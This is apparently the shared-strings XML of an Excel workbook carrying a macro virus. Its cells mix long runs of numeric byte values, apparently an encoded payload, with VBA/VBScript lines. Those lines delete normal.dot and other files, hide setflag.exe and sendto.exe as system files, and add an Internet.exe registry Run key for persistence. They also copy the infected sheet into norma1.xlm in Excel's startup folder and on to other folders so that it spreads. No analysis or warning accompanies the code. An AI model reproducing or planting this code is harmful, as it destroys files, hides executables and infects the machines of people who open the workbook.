    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
